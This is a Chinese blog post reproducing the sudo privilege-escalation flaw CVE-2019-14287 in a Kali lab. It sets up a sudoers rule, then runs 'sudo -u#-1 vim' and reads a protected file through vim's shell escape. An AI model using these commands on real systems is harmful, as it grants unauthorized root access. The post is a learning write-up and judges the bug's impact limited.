美文网首页
sudo提权漏洞复现

sudo提权漏洞复现

作者: z1un | 来源:发表于2019-10-17 23:30 被阅读0次

    漏洞ID:CVE-2019-14287

    漏洞公布日期:2019年10月14日

    影响范围:sudo 1.8.28 之前的所有版本

    复现环境:kali

    因为sudo是平时用得较多的一个命令,前两天得知了这个漏洞,就复现一下。

    复现

    先查看sudo版本

    sudo -V
    

    sudo版本低于1.8.28

    创建一个test用户用于本次测试

    useradd test
    passwd test
    

    编辑/etc/sudoers文件

    vim /etc/sudoers
    

    添加

    test ALL = (ALL, !root) /usr/bin/vim
    

    这里表示用户test以任意非root身份运行/usr/bin/vim,执行vim命令

    如果是直接添加:

    test ALL = (ALL, !root) /usr/bin/bash
    

    是不是就可以直接提权呢?

    test用户查看本地1文件,显示权限不够

    然后我们输入

    sudo -u#-1 vim
    

    或者

    sudo -u#4294967295 vim
    

    只要用户在使用sudo命令时指定UID-14294967295,就可以以root身份执行命令。这是因为命令在将UID转换为对应用户时,会将-14294967295这两个异常数字视为0,而0root用户的UID,因此可以实现在普通用户下执行root用户权限。

    vim界面下尝试读取1文件

    :!cat ./1
    

    读取成功

    总结

    该漏洞需要实现的话需要root用户在sudoers文件中添加一些非标准的配置,个人认为漏洞影响范围不大,因为谁没事会在sudoers中添加这些配置呢。

    相关文章

      网友评论

          本文标题:sudo提权漏洞复现

          本文链接:https://www.haomeiwen.com/subject/weebmctx.html